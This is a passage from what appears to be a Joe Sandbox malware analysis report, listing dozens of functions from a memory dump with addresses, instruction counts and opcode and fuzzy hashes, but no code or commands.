                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8e57e57fa8f7a2a60b048b59671d2ef300f4372b374747c4d35b372bb7cdbd95
                                                                                                                              • Instruction ID: 8eb566cf339b89472c88d011973bfda615300c28fb1a33dbbfe34f8cc8d18cfc
                                                                                                                              • Opcode Fuzzy Hash: 8e57e57fa8f7a2a60b048b59671d2ef300f4372b374747c4d35b372bb7cdbd95
                                                                                                                              • Instruction Fuzzy Hash: 5C510170900705EFD720EF6AC880A6BFBF9FF94710F50461ED292976A2CBB4A944CB50
                                                                                                                              Function 01A1E443 Relevance: .2, Instructions: 158COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: ee2e44e0122341b20a309c41fe1387525381a37f579a687ca673c5ac0ba722fe
                                                                                                                              • Instruction ID: 49b564f22e6da580fe25a352b27fdd3abb1da6fe3e5ddc9fce0de9763341cdef
                                                                                                                              • Opcode Fuzzy Hash: ee2e44e0122341b20a309c41fe1387525381a37f579a687ca673c5ac0ba722fe
                                                                                                                              • Instruction Fuzzy Hash: 1A519E71600A16EFCB22EF69C980F6AB3F9FF58794F45042EEA4697261D734E940CB50
                                                                                                                              Function 01A84180 Relevance: .2, Instructions: 156COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: dfea214f28f197392b551d83465e162cdd3e061f0c05b0376fcf14ddc27c47fe
                                                                                                                              • Instruction ID: fe64bbd30cad7c306d67c9640163a955499cee7128690746cca2d53d147973fb
                                                                                                                              • Opcode Fuzzy Hash: dfea214f28f197392b551d83465e162cdd3e061f0c05b0376fcf14ddc27c47fe
                                                                                                                              • Instruction Fuzzy Hash: FC5176716083429FD754EF29D880A6BBBE5FFD8218F444A2EF599C7250EB30D905CB92
                                                                                                                              Function 01A045B1 Relevance: .2, Instructions: 156COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                              • Instruction ID: f6acff19c508ef8892e0f5eb6a7d7e412d805ddff232f3d3225f928b6626f600
                                                                                                                              • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                              • Instruction Fuzzy Hash: 73519471E0021AABDF16DF98D540BEEBBB9FF89754F044069EA01AB290D774DD44CBA0
                                                                                                                              Function 01A6E9E0 Relevance: .2, Instructions: 154COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                              • Instruction ID: 0ed0da09114c0774b4f4d70c6f613bd62adea1281bc31a4c0a519f1ddce1dbc9
                                                                                                                              • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                              • Instruction Fuzzy Hash: 7B519875D0021AEFEF21DF94C994BAEBBBDAF00324F158665D61267190D7349E44CBA0
                                                                                                                              Function 01AA8B28 Relevance: .2, Instructions: 152COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 31f3d758094515e8d732bb4a34f45e4a262113bed0f6f01538c69463f4989ea7
                                                                                                                              • Instruction ID: 8b80b1268b692a6ac8b33f8db7d980cdb5e877c05fce167523f5c28b68e0b74b
                                                                                                                              • Opcode Fuzzy Hash: 31f3d758094515e8d732bb4a34f45e4a262113bed0f6f01538c69463f4989ea7
                                                                                                                              • Instruction Fuzzy Hash: 544108707016019BE729DF2DC994B7FBB9AFF90622F888219E955C7280DB3CD801CB91
                                                                                                                              Function 01A6CBF0 Relevance: .1, Instructions: 148COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9f1eb79ec8a859b74c27c3811257f414a8220febc66eb74a9d73d755c237b188
                                                                                                                              • Instruction ID: 3a638fe669621e69ca4bff5b16fc99b1795b9d290e0f5c43f3d7a270af9f42f1
                                                                                                                              • Opcode Fuzzy Hash: 9f1eb79ec8a859b74c27c3811257f414a8220febc66eb74a9d73d755c237b188
                                                                                                                              • Instruction Fuzzy Hash: BE51A075A00216DFCB21DFA9C9809AEBBB9FF98324B154519D58AA3308E734FD05CBD0
                                                                                                                              Function 01A1A430 Relevance: .1, Instructions: 139COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 28b75ee36e91a86fc86e11a756241769f82ec6e69860a45a7f9b3bca89e705e5
                                                                                                                              • Instruction ID: e0ed03919514e13076de0f59ef7a8b3cb92a8a3f16b6708c801c2a3080cf19cf
                                                                                                                              • Opcode Fuzzy Hash: 28b75ee36e91a86fc86e11a756241769f82ec6e69860a45a7f9b3bca89e705e5
                                                                                                                              • Instruction Fuzzy Hash: E8414675746642ABCB2AEF78D980B6B3775EB64718F41002CEE0BDB24AD7B1D801C760
                                                                                                                              Function 01AAA9D3 Relevance: .1, Instructions: 139COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                              • Instruction ID: fac133e6542072fda4f5b8da2950792c1216bf43abdda10c0ce63c5b8806b1ed
                                                                                                                              • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                              • Instruction Fuzzy Hash: CA410A71600716AFD725CF28C994A6BB7E9FF80310F49462EE91687640EB30ED08C7D0
                                                                                                                              Function 01A101F8 Relevance: .1, Instructions: 138COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b9542d05d59f6fded41792ff58a72b52202442ece3f0089544f69cdd22952604
                                                                                                                              • Instruction ID: fc4856475821adc33957f4e73b74f8b32d2275450c9650c0f29b941a2bc79588
                                                                                                                              • Opcode Fuzzy Hash: b9542d05d59f6fded41792ff58a72b52202442ece3f0089544f69cdd22952604
                                                                                                                              • Instruction Fuzzy Hash: 6B41DD36E00219DBDB14DF98C640AEEBBB8BF48710F19812AF915FB244D7359D81CBA4
                                                                                                                              Function 01A0EBFC Relevance: .1, Instructions: 138COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e88a7b9e7f41a31e16bd2e8a32c6558fcb729349d0463cd50d7787e73878322e
                                                                                                                              • Instruction ID: 19266e272007c49ab61e68db19e9db5264e5da99fd22b408a84c8a49bf8aa7f5
                                                                                                                              • Opcode Fuzzy Hash: e88a7b9e7f41a31e16bd2e8a32c6558fcb729349d0463cd50d7787e73878322e
                                                                                                                              • Instruction Fuzzy Hash: B941A1716047019FD725DF28D884A27B7F5FB88318F04482DE697C7651EB35E8489B91
                                                                                                                              Function 01A22750 Relevance: .1, Instructions: 137COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                              • Instruction ID: 962a88c0f962d8b2ea961a4323a6e5de4dfcd859ad40bd789bcc2abcfb01f7d1
                                                                                                                              • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                              • Instruction Fuzzy Hash: F9515D75A04215CFCB55CF98C580AADFBF2FF84724F1882A9D915A7352D770AE81CB90
                                                                                                                              Function 019E6154 Relevance: .1, Instructions: 133COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 61b26d666ff632aed4caf19fdc4ab83e372fc1d7ef9e60d821765b0c1b4d419e
                                                                                                                              • Instruction ID: 9df8753e4a80e89670a6090feb093fdb4248d8d399ac82b78c0d3a65a0a0807a
                                                                                                                              • Opcode Fuzzy Hash: 61b26d666ff632aed4caf19fdc4ab83e372fc1d7ef9e60d821765b0c1b4d419e
                                                                                                                              • Instruction Fuzzy Hash: 6551E470904616DBDB268B28CD08BE8BBF5FF65314F1482A9E62D972D1D7349981DF80
                                                                                                                              Function 019E0BCD Relevance: .1, Instructions: 130COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5d8a5034b8519d6ebbb635fba16b03567ee45ac9144642cc93b77bea79a3157c
                                                                                                                              • Instruction ID: b1a4b895c3b2741adcff389855baf176bd8a11bca7095b13a1ec6e6aed5e5ce7
                                                                                                                              • Opcode Fuzzy Hash: 5d8a5034b8519d6ebbb635fba16b03567ee45ac9144642cc93b77bea79a3157c
                                                                                                                              • Instruction Fuzzy Hash: 47418031E003299BDB22DF68C948BEA77B8EF85750F0504A9E90DAB241D774DE85CF91
                                                                                                                              Function 01AA866E Relevance: .1, Instructions: 129COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                              • Instruction ID: d45d74540a26d0d2ffb49b251a6535c888d36f5574d3d4f3ec89cceeb08500c0
                                                                                                                              • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                              • Instruction Fuzzy Hash: 5341B475B00205ABEB15DF99CD84ABFBFBAAF88641F544069E904E7341DB78DE00C7A0
                                                                                                                              Function 019E0887 Relevance: .1, Instructions: 128COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: fa0154b0e8db8ce4bb016f579fd3b81e80f96ad0ab0244ba3456e0e78d041b53
                                                                                                                              • Instruction ID: e8cda72c76d1860dcdef214279d344f95d7cf198ab7702b12710ac254ce8a90a
                                                                                                                              • Opcode Fuzzy Hash: fa0154b0e8db8ce4bb016f579fd3b81e80f96ad0ab0244ba3456e0e78d041b53
                                                                                                                              • Instruction Fuzzy Hash: A641A1717007069FE326CF28C484A26B7F9FF89314B184A6DE54F87A50E7B1E845CB90
                                                                                                                              Function 01A0A470 Relevance: .1, Instructions: 127COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 63f3f73c3341b6a331530d071ce1448c53be0a3db60d2f39d3788927b3dc9131
                                                                                                                              • Instruction ID: 2114cb4ab42281f177344d388d087e5667fba206dc8375b5464b526278b5a868
                                                                                                                              • Opcode Fuzzy Hash: 63f3f73c3341b6a331530d071ce1448c53be0a3db60d2f39d3788927b3dc9131
                                                                                                                              • Instruction Fuzzy Hash: 1041DC36941705CFDB22CF68E594BAD7BB0FB58720F094199D416AB2D1DB36A901CBA0
                                                                                                                              Function 019E8BF0 Relevance: .1, Instructions: 124COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6c6e7750e2a64b7d04b99ce1e41fc1b90a5513ba85316a7234355e0c3a2fe8c1
                                                                                                                              • Instruction ID: e4cf1dc372c9fd6c6ea28cf7b4ef559998ed85268c507b2180d16f3e17f9d572
                                                                                                                              • Opcode Fuzzy Hash: 6c6e7750e2a64b7d04b99ce1e41fc1b90a5513ba85316a7234355e0c3a2fe8c1
                                                                                                                              • Instruction Fuzzy Hash: E1412836901602DBD726DF88D888B5ABBF5FBDD700F14846EE5069B665C335D842CF90
                                                                                                                              Function 019D8918 Relevance: .1, Instructions: 123COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2c94f446fd8d29b74a4ed574d3b88495657827a43839f6ddd84e8965ad1d98e7
                                                                                                                              • Instruction ID: 0c2e90f6dd0a751dd2a845c32b0c317837f7a7d63f41ffff1252f8386af3b993
                                                                                                                              • Opcode Fuzzy Hash: 2c94f446fd8d29b74a4ed574d3b88495657827a43839f6ddd84e8965ad1d98e7
                                                                                                                              • Instruction Fuzzy Hash: BB417C315087069ED312DF69C940B6BB7E9EF88B54F41092EFA84D7251E730DE048BA3
                                                                                                                              Function 019DA020 Relevance: .1, Instructions: 122COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                              • Instruction ID: 51e20ff0dadca2d8a750d4ee96c5601e80dbfed6a7157d460163cca51a13e1e0
                                                                                                                              • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                              • Instruction Fuzzy Hash: 95412831A04211EFEB21DF69C440BBABB72EBD1755F15C06AF9499B280D637DD90CBA0
                                                                                                                              Function 019E09AD Relevance: .1, Instructions: 122COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2b6c6183201ff8b02e7da9a2b883a959c757296f6dbb6751a6dcec890bb85f6d
                                                                                                                              • Instruction ID: e2e4b67c19b3d5f141e8ecd577c030c40d73748dbafc2d099e424166f9d817f4
                                                                                                                              • Opcode Fuzzy Hash: 2b6c6183201ff8b02e7da9a2b883a959c757296f6dbb6751a6dcec890bb85f6d
                                                                                                                              • Instruction Fuzzy Hash: 0B417C71600605EFD722DF18C844B26BBF8FF94714F28892AE54DCB251E770E942CB90
                                                                                                                              Function 01A10710 Relevance: .1, Instructions: 121COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                              • Instruction ID: 8d490fd0b87db3bfd0ea204c667c6cc8372a03269e740b87f4ad9835889f2512
                                                                                                                              • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                              • Instruction Fuzzy Hash: 1D413D71A04705EFDB25CFA9CA80AAABBF4FF18700B14496DE556DB654D330EA84CF90
                                                                                                                              Function 019E262C Relevance: .1, Instructions: 119COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a22afbb59b2be87ca84fbe68105d9c9c5ee54180717c3d54b37412895522422a
                                                                                                                              • Instruction ID: 5d46d19e362759d04d6066af1118a1ecca27fd402ddf2cb88eceeb788fb47e87
                                                                                                                              • Opcode Fuzzy Hash: a22afbb59b2be87ca84fbe68105d9c9c5ee54180717c3d54b37412895522422a
                                                                                                                              • Instruction Fuzzy Hash: DD41CEB1941705DFCB23EF28C908B59B7F9FF94711F14866AD40A8B2A1DB31A941CF51
                                                                                                                              Function 01A1C8F9 Relevance: .1, Instructions: 116COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d399176f291c4fb516c844d6e0de0f072302ff854371dd0b3ac2ef509bc0111e
                                                                                                                              • Instruction ID: f37bd471b3dae29821291e4b7b8a26640fa71710732e2979a68864e845d2bc17
                                                                                                                              • Opcode Fuzzy Hash: d399176f291c4fb516c844d6e0de0f072302ff854371dd0b3ac2ef509bc0111e
                                                                                                                              • Instruction Fuzzy Hash: 9A319AB2A44345EFDB52CFA8C140799BBF5FB48724F2081AED519DB256D3369902CB90
                                                                                                                              Function 01A607C3 Relevance: .1, Instructions: 114COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6c584cc671affa1335d90af445fda3c017b08b63274fdd124d81e24adf0fd3e8
                                                                                                                              • Instruction ID: b250a2902889fd22c864175dcbe8d7add6345b96d313058d1285658791a9d282
                                                                                                                              • Opcode Fuzzy Hash: 6c584cc671affa1335d90af445fda3c017b08b63274fdd124d81e24adf0fd3e8
                                                                                                                              • Instruction Fuzzy Hash: 1D418B729083019FD361DF29C944B9BBBE8FF88664F004A2EF598C7291DB70D945CB92
                                                                                                                              Function 01A605A7 Relevance: .1, Instructions: 111COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 322bd4fb673d1da75f254694dbe992e266c21fc23e1c42221e18f8c0d3551010
                                                                                                                              • Instruction ID: da5b7296650efa2b2bc8a3c4d50fd51074002bcc1e23fba680f98280c5e65247
                                                                                                                              • Opcode Fuzzy Hash: 322bd4fb673d1da75f254694dbe992e266c21fc23e1c42221e18f8c0d3551010
                                                                                                                              • Instruction Fuzzy Hash: 8541DE766086429FC320DF2CD940A6AB7E9FFC8700F144A2DF99887680E734ED44C7A6
                                                                                                                              Function 019E4859 Relevance: .1, Instructions: 111COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: de82f3e809d1e807d24e44bee50ed24287b3784bf70c2685b2e4ecd4c7d6fa32
                                                                                                                              • Instruction ID: e080b9fa251a0c73d071bae2d3f8b7b7a411e500e4c7d60434027d9f35a5554a
                                                                                                                              • Opcode Fuzzy Hash: de82f3e809d1e807d24e44bee50ed24287b3784bf70c2685b2e4ecd4c7d6fa32
                                                                                                                              • Instruction Fuzzy Hash: 7141F7306003029BD726DF2CD898B26BBE9FFC0B55F15446DE649DB291D734D901CB51
                                                                                                                              Function 019F02E1 Relevance: .1, Instructions: 106COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                              • Instruction ID: 9ec97268465e2a8de03c46e25a4712b74732654be55b687462bfb46bf0ba0f32
                                                                                                                              • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                              • Instruction Fuzzy Hash: 6D310931A04245BFDB228B68CC44FABBFEDEF54350F084569F459D7352D6B49444CB94
                                                                                                                              Function 01A8E3DB Relevance: .1, Instructions: 105COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
